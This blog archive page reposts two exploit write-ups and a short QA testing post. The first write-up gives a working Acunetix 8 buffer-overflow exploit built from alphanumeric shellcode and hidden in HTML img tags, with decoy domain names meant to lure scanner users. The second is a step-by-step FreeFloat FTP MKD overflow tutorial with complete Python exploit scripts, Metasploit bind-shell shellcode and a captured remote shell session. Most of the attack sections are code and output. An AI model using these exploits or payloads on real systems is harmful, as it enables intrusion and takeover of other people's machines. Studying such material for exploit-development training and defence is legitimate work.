Category Archives: Vulnerabilitiies

Pwn the n00bs – Acunetix 0day

A few weeks ago I have published an article about WINRAR 0DAY.

That article revealed a new vulnerability that gave attackers, the ability to perform spoofing attack.

Many people wrote to me about the problems of that kind of article (for example).

So this time I’m goanna reveal a new 0DAY that will help security managers to protect their web sites against many vulnerability scans.

A lot of sites owners will tell you that the majority numbers of scans, performed against their sites, are performed by automatic tools like NESSUS, ACUNETIX, and APPSCAN.

Today 0DAY will be focused on one of the most popular web scan in the world, ACUNETIX.

The POC will be against ACUNETIX 8 (build 20120704 since it’s one of the most common cracked version which was published in the net and used by many newbie hackers).

This disclosure will not only reveal a new vulnerability, but demonstrates a whole new perception of dealing with external attacks.

Instead of protecting your web sites again and again, or buying a new advanced WAF (web application firewall), let’s give the attackers a reason to be afraid, reason to think twice before they press the “SCAN” button.

In this article, I will not give a full working exploit for all scan scenarios nor for all operating systems, but a proof of concept that hopefully will grow into a new effort of research for vulnerabilities in Penetration test tools.

So let’s get our hands dirty

 

ACUNETIX is a powerful tool for scanning and finding vulnerabilities at websites.

Many newbie attackers tend to use this tool due to the simplicity of its use.

ACUNETIX offers its users a simple wizard base scan that covers many aspects of the vulnerability scan.

One of the aspects is the ability to scan more domains or sub domains related to the scanned website.
For example, if we scan my blog “http://an7isec.blogspot.co.il”, we will get the result shown below:
After a little research about this option, I figured out that ACUNETIX starts its wizard by sending an HTTP request to the site and learning about it from its HTTP response.

Furthermore the wizard learns about the external related domains from the external sources that appear at the website, for example:

“<img src=http://externalSource.com/someimg.png >”

“<a href=http://externalSource.com/ ></a>”

Etc…

Further Analysis reveals that if one of the external domain name length is more than 268 Byte’s, ACUNETIX will be crashed , so if we want to cause a crash, all we need to do is to put some kind of external source at our site, which have the length of 268 Byte’s or more, say something like this:
<A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA”>

 

Quick view of this application in Immunity Debugger reveals that EDX was corrupted by the fuzzing string which caused access violation:

Despite the fact that further writing runs over the Structured Exaction Handler (SEH) as you will probably notice ,my advice for you is not to go that way, believe me I tried it for several days with no success (because of the safe SHE mechanism).

However, we have another problem with this exploit, In one word, “ASCII”.

ACUNETIX gets its information about external domains as a URL.

This fact causing the string to be converted into Web Browser friendly string.

While ASCII accepts chars like:

0x22 (“), 0x23 (#), 0x24 ($), 0x25 (%), 0x5C (\), 0x2F (/) and more …

URL string accepts only printable alphanumeric chars and URL converted special chars (with few exceptions).

So if my external source contains one of the special chars, they will be converted into

”%SOMETHING”.

For example, the char “quotes” (“) will be converted into 253232 in the memory because it’s the translation of %22.

Another example that demonstrates the URL encoding is: the char “percent” (%) which will be converted into 253235 in the memory.

Bypassing it, will be by building an exploit that contains only “A-Z, a-z, 1-0” chars and few special chars that aren’t converted in the process of URL ENCODE like:

“! ( ) = } { ” .

(not a simple job at all)

In short, I had to find a way to fix the flow of the application in order to avoid SEH based exploit (Because it was impossible to bypass safe SHE protection with URL ASCII strings only).

Finally, I found a way.
In order to fix the flow, EDX had to be overwritten with a readable memory address.

Nevertheless, it is important to remember that EDX is not been used as is, but minus 8:

MOVE ECX, DWORD PTR DS: [EDX-8];

Meaning that it doesn’t matter which memory address we use, we should add 8 to the address (in the exploit), convert the whole address into printable URL STRING, and hope to the best.

After little research, I found such an address.

The address was at “0x663030XX” and luckily it had the possibility to be converted into URL String without special bad char’s –> ” f005 “.

After playing with the code I found that the exact location of that EDX overwrite, is at 268 Byte’s offset.

So for now our exploit looks like this:

<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>

Running ACUNETIX’s scan against that payload, caused the next result:

 

 

As you can see above, the EIP was overwritten!!

It appears that the idea of fixing the flow was successful since it enabled me to be in a better position of attack (EIP overwrite).

Beside it, our potential space for shell code is now presented in EAX and ESP.

When it comes to the decision whether choosing ESP or EAX, ESP is a better choice from two different aspects:

One, ESP is pointing directly at the beginning of the shell string.

Two, there is much more space for a biggest shell code to be written.

After I chose ESP, I needed to find an instruction of “JMP ESP” in a memory address that could be written by URL string (limited ASCII as mention above).

The desired address successfully founded at the location of: 0x7e79515d (SXS.DLL) –

(In ASCII “ ]Qy~ “).

After all that, our shell code supposed to look like this:
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>

  • 500f = 0x66303035 : readable memory location for fixing the flow of the application that was corrupted by the buffer overflow.
  • ]Qy~ = 0x7e79515d (JMP ESP from SXS.DLL).

 

OK, right now we are at the semifinal stage, running the application against above payload, produced the next result:

 

Yea… we landed exactly at the beginning of the final payload.

The next step will be to use suitable windows shell that will be made only from URL string (limited ASCII).

Such shell can be generated with “ Metasploit ” and it is called “Alphanumeric Shell”.

The important thing to remember while using such payload, is that the payload’s start address must be presented at one of the registers. If the payload presents at ESP, the first OP CODE of the shell need to be “PUSH ESP”.

In my Proof of concept, I used simple “CALC.EXE” shell code generated by “Metasploit that led me to the final stage which is ;working exploit!!

Moreover, our exploit is successfully bypassing DEP protection, simply by choosing only the addresses that aren’t compiled with DEP.

And due to the fact that ACUNETIX itself is not complied with DEP, this exploit should work perfectly on windows XP.

 

After successfully reaching all our goals, Let’s look on the final working exploit:

<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB 0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9 JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6 LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
We need to remember that in order to enjoy our exploit, the newbie hacker must check our extra domain name, in the list of the extra domains in ACUNETIX wizard window.

So what can we do in order to make our domain name attractive?

Thinking about it, I came up with two ideas:

1: writing some attempting domain name that will make the hackers check that domain, like, ADMIN.ControlMangment.1249874350345.An7isec.blogspot.co.il .

2: using several external domains with the following names:

“SQLINJECTION”

“XSS”

“CSRF”

And so on…

These kind of names will probably give the eye of the hacker the feeling that the domain list window is actually an options window.

The written code bellow demonstrates that kind of misleading:

<html> <img src=”http://SQLInjection…………………………………. …………………………………………………………… …………………………………………………………… …………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB 0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9 JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6 LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
<img src=”http://XSS…………………………………………. …………………………………………………………… …………………………………………………………… …”>
<img src=”http://CSRF………………………………………… …………………………………………………………… …………………………………………………………… ….”>
<img src=”http://DeepScan…………………………………….. …………………………………………………………… …………………………………………………………… ……..”>
<img src=”http://NetworkScan………………………………….. …………………………………………………………… …………………………………………………………… ………..”>
<img src=”http://DenialOfService………………………………. …………………………………………………………… …………………………………………………………… ……………”>
</html>

In conclusion,

Following all the above, we created a powerful exploit that Newbie hackers

will definitely fall for.

This exploit will give us the ability to do everything with all that nasty Newbie hackers that scan our sites day and night, killing our traffic, filling all the web site forms with junk and so on…

Furthermore it can be used in order to collect smart intelligence about hostile forces who want to attack our web application.

BUT!!

The more powerful idea that motivated me to reveal this concept and POC, is the fact that this exploit is Anonymity killer! , because even if the attacker uses the most smart and secure proxy in the world, such as “TOR” and others, his ass will be revealed and full control on his scanning machine will be gained.
The exploit can be download from here.

Source: an7isec.blogspot

 

My First Buffer Overflow Exploit

Saved Return Pointer Overflows

For our first buffer overflow exploit we will be starting with the most straight forward scenario where we have a clean EIP overwrite and one of our CPU registers points directly to a large portion of our buffer. For this part we will be creating an exploit from scratch for ”FreeFloat FTP”. You can find a list of several exploits that were created for ”FreeFloat FTP” here.

 

Normally we would need to do badcharacter analysis but for our first tutorial we will rely on the badcharacters that are listed in the pre-existing metasploit modules on exploit-db. The characters that are listed are ”\x00\x0A\x0D”. We need to keep these characters in mind for later.

 

Exploit Development: Backtrack 5/Kali Linux
Debugging Machine: Windows XP PRO SP3
Vulnerable Software: Download

 

Replicating The Crash

First of all we need to create a POC skeleton exploit to crash the FTP server. Once we have that we can build on it to create our exploit. You can see my POC below, I have based it on the exploits for ”FreeFloat FTP” that I found on exploit-db. We will be using the pre-existing ”anonymous” user account which comes configured with the FTP server (the exploit should work with any valid login credentials).

#!/usr/bin/python
import socket
import sys
evil = "A"*1000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

 

Ok, so far so good, when we attach the debugger to the FTP server and send our POC buffer the program crashes. In the screenshot below you can see that EIP is overwritten and that two registers (ESP and EDI) contain part of our buffer. After analyzing both register dumps ESP seems more promising since it contains a larger chunk of our buffer (I should mention however that creating an exploit starting in EDI is certainly possible).

 

 

Overwriting EIP

Next we need to analyze our crash, to do that we need to replace our A’s with the metasploit pattern and resend our buffer. Pay attention that you keep the original buffer length since a varying buffer length may change the program crash.

root@bt:~/Desktop# cd /pentest/exploits/framework/tools/
root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A
d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah
0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5
Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0A
o1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar
6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1
Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6A
y7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc
2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7
Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

 

When the program crashes again we see the same thing as in the screenshot above except that EIP (and both registers) is now overwritten by part of the metasploit pattern. Time to let “mona” do some of the heavy lifting. If we issue the following command in Immunity debugger we can have “mona” analyze the program crash. You can see the result of that analysis in the screenshot below.
!mona findmsp

 

From the analysis we can see that EIP is overwritten by the 4-bytes which directly follow after the initial 247-bytes of our buffer. Like I said before we can also see that ESP contains a larger chunk of our buffer so it is a more suitable candidate for our exploit. Using this information we can reorganize the evil buffer in our POC above to look like this:
evil = “A”*247 + “B”*4 + “C”*749
When we resend our modified buffer we can see that it works exactly as we expected, EIP is overwritten by our four B’s.

 

That means that we can replace those B’s with a pointer that redirects execution flow to ESP. The only thing we need to keep in mind is that our pointer can’t contain any badcharacters. To find this pointer we can use “mona” with the following command. You can see the results in the screenshot below.
!mona jmp -r esp

 

 

It seems that any of these pointers will do, they belong to OS dll’s so they will be specific to “WinXP PRO SP3” but that’s not our primary concern. We can just use the first pointer in the list. Keep in mind that we will need to reverse the byte order due to the Little Endian architecture of the CPU. Observe the syntax below.
Pointer: 0x77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5701 (C:\WINDOWS\system32\msvcrt.dll)
Buffer: evil = “A”*247 + “\x59\x54\xC3\x77” + “C”*749
I should stress that it is important to document your exploit properly for your own and others edification. Our final stage POC should look like this.

#!/usr/bin/python
import socket
import sys
#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
# 0x77c35459 : push esp #  ret  | msvcrt.dll
#------------------------------------------------------------
evil = "A"*247 + "\x59\x54\xC3\x77" + "C"*749
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

 

Ok lets restart the program in the debugger and put a breakpoint on our pointer so the debugger pauses if it reaches it. As we can see in the screenshot below EIP is overwritten by our pointer and we hit our breakpoint which should bring us to our buffer located at ESP.

 

 

 

Shellcode + Game Over

We are almost done. We need to (1) modify our POC a bit to add a variable for our shellcode and (2) insert a payload that is to our liking. Lets start with the POC, we will be inserting our payload in the part of the buffer that is now made up of C’s. Ideally we would like to have the buffer length modified dynamically so we don’t need to recalculate if we insert a payload with a different size (our total buffer length should remain 1000-bytes). We should also insert some NOP’s (No Operation Performed = \x90) before our payload as padding. You can see the result below. Any shellcode that we insert in the shellcode variable will get executed by our buffer overflow.

#!/usr/bin/python
import socket
import sys
shellcode = (
)
#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
# 0x77c35459 : push esp #  ret  | msvcrt.dll
#------------------------------------------------------------
buffer = "\x90"*20 + shellcode
evil = "A"*247 + "\x59\x54\xC3\x77" + buffer +"C"*(749-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

 

All that remains now is to pop in some shellcode. We will be using msfpayload to generate our shellcode and pipe the raw output to msfencode to filter out badcharacters.

 

root@bt:~# msfpayload -l
[...snip...]
windows/shell/reverse_tcp_dns     Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell_bind_tcp            Listen for a connection and spawn a command shell
windows/shell_bind_tcp_xpfw       Disable the Windows ICF, then listen for a connection and spawn a 
                                  command shell
[...snip...]

root@bt:~# msfpayload windows/shell_bind_tcp O

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell
  
root@bt:~# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

unsigned char buf[] = 
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92";

After prettifying the code a bit and adding the relevant notes the final exploit is ready.

#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Exploit: FreeFloat FTP (MKD BOF)                                                 #
# OS: WinXP PRO SP3                                                                #
# Author: b33f (Ruben Boonen)                                                      #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 2 of my Exploit Development tutorial series... #
#----------------------------------------------------------------------------------#
# root@bt:~/Desktop# nc -nv 192.168.111.128 9988                                   #
# (UNKNOWN) [192.168.111.128] 9988 (?) open                                        #
# Microsoft Windows XP [Version 5.1.2600]                                          #
# (C) Copyright 1985-2001 Microsoft Corp.                                          #
#                                                                                  #
# C:\Documents and Settings\Administrator\Desktop>                                 #
#----------------------------------------------------------------------------------#
import socket
import sys
#----------------------------------------------------------------------------------#
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                     #
#----------------------------------------------------------------------------------#
shellcode = (
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D                                                           #
# 0x77c35459 : push esp #  ret  | msvcrt.dll                                       #
# shellcode at ESP => space 749-bytes                                              #
#----------------------------------------------------------------------------------#
buffer = "\x90"*20 + shellcode
evil = "A"*247 + "\x59\x54\xC3\x77" + buffer + "C"*(749-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

 

In the screenshot below we can see the before and after output of the “netstat -an” command and below that we have the backtrack terminal output when we connect to our bind shell. Game Over!!

 

root@bt:~/Desktop# nc -nv 192.168.111.128 9988
(UNKNOWN) [192.168.111.128] 9988 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.111.128
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 

C:\Documents and Settings\Administrator\Desktop>

Source:  fuzzysecurity.com

Image Source: img.wonderhowto.com

How to find a bug in application for penetration ?

A very good and important point. Right? If you are a software tester or a QA engineer then you must be thinking every minute to find a bug in an application. And you should be!

I think finding a blocker bug like any system crash is often rewarding! No I don’t think like that. You should try to find out the bugs that are most difficult to find and those always misleads users.

Finding such a subtle bugs is most challenging work and it gives you satisfaction of your work. Also it should be rewarded by seniors. I will share my experience of one such subtle bug that was not only difficult to catch but was difficult to reproduce also.
I was testing one module from my search engine project. I do most of the activities of this project manually as it is a bit complex to automate. That module consist of traffic and revenue stats of different affiliates and advertisers. So testing such a reports is always a difficult task. When I tested this report it was showing the data accurately processed for some time but when tried to test again after some time it was showing misleading results. It was strange and confusing to see the results.

There was a cron (cron is a automated script that runs after specified time or condition) to process the log files and update the database. Such multiple crons are running on log files and DB to synchronize the total data. There were two crons running on one table with some time intervals. There was a column in table that was getting overwritten by other cron making some data inconsistency. It took us long time to figure out the problem due to the vast DB processes and different crons.

My point is try to find out the hidden bugs in the system that might occur for special conditions and causes strong impact on the system. You can find such a bugs with some tips and tricks.

So what are those tips:

1) Understand the whole application or module in depth before starting the testing.

2) Prepare good test cases before start to testing. I mean give stress on the functional test cases which includes major risk of the application.

3) Create a sufficient test data before tests, this data set include the test case conditions and also the database records if you are going to test DB related application.

4) Perform repeated tests with different test environment.

5) Try to find out the result pattern and then compare your results with those patterns.

6) When you think that you have completed most of the test conditions and when you think you are tired somewhat then do some monkey testing.

————

